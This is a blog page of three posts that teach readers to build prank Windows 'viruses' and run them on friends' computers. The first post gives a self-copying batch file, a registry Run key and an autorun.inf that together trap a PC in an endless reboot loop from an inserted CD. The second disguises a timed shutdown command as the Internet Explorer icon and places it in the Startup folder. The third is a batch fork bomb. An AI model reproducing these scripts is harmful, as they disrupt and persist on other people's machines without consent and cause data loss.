Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts
0

Virus to Restart system

Effect:
This Virus plans itself in your computer and in the registry. It restarts your computer instantly and then it restarts your computer every time it starts up. Causing a continuos loop.


How to make it:

1. Open up a notepad and type the following:
Code:

@echo off copy lol.bat "C:\WINDOWS\system\" /y regedit /s "lol.reg" shutdown -f -r

Explanation:
a) @echo off - Makes the code invisible.

b) copy lol.bat "C:\WINDOWS\system\" /y - Automatically(/y) copies itself to the "system" folder automatically.

c) regedit /s "lol.reg" - Automatically(/s) runs the .reg file that you will make in step 3.

d)shutdown -f -r - Automatically(-f) shuts down and restarts(-r) the computer.

2. Save it in a folder on your desktop or somewhere as "lol.bat".

3. Open up another notepad and type the following:
Code:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] "lol"="C:\\WINDOWS\\system\\lol.bat"

Explanation:
a)[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run] - The startup folder in the registry (everything in there runs on startup.)

b)"lol"="C:\\WINDOWS\\system\\lol.bat" - "lol" is what the string will be called the path is where your .bat file copied itself, remember.

4. Save it in the same folder as "lol.bat", call it "lol.reg".

5. Give it to your friends.



Make an autorun file and copy it to disc along with the .bat and the .reg.

6. Open up a notepad and type the following:
Code:

[autorun] ShellExecute=lol.bat icon=apc.ico

Explanation:
a)ShellExecute=lol.bat - Automatically runs "lol.bat" when you pop your cd/dvd into the drive.

7. Save this into the same folder as "lol.bat" & "lol.reg", call it "autorun.inf".

8. Copy "lol.bat", "lol.reg" & "autorun.inf" to a blank cd or dvd.

9. Stick it into someone's computer for epic lulz.


More...
2

Virus to shut down pc

Hi, by this, the pc will shut down and u wil lose any unsaved info.... so use it carefully....this is how to make it...

On the desktop, right click and go to NEW>SHORTCUT.
In the target, type, this...better just copy and paste it....

shutdown -s -t 300 -c ""

ex: shutdown -s -t 300 -c "Virus detected"

thn click NEXT.....instead of that 300, u can type any amout of time that u would like to give the virus to shutdown the pc....those 300 are SECONDS left to shutdown....so u can type thr any number...but it'll be more fun when its atleast 300 secs.....and the VIRUS DETECTED is the msg that the screen shows when u click on thye virus....thr u wil see both the time and the msg...i'm sure that once when u see it, u're gonna think its real......

thn in the NAME OF THE SHORT CUT, type whatever u want, (Eg Internet Explorer), because internet explorer's icon is available in the pc's....thn click FINISH...
Now u have the application file on the desktop. RIGHT-CLICK it and go to its PROPERTIES....thr, click on CHANGE ICON, and select the INTERNET EXPLORER and press APPLY.....
so now that file will look exactly like the original internet explorer file on ur desktop....
Go ahead and click it, but be sure to CLOSE ALL THE APPLICATIONS BEFORE U CLICK IT.IT WILL NOT CAUSE ANY HARM TO UR PC.SO DON'T WORRY.

To stop it just open run and type "shutdown-a" without quotes. Then it will stop executing

if u want to make ur frnd scare then create this virus and drag that shortcut to start>programs>startup
everytime when he turn on his pc it will shutdown automatically.. heheh

just try it......Enjoy...and do send ur feedbacks soon...Then i might tel u HOW TO MAKE A REAL VIRUS......


More...
1

Create a Virus

Write VIRUS to computer in 5 minutes
Creating virus trick

open ur notepad n type the following.........


start

.bat


save it as .bat

ex:

start

mypic.bat

save as mypic.bat

dont forgot to change Save as type to All files

its a virus which open unlimited command window.

no harm to ur pc but u have to shut down ur pc when u execute it because u will not have any other option to shut down ur pc.

create it and send it to ur frnz and make them scare hehehe


More...
Arakne-Links Directory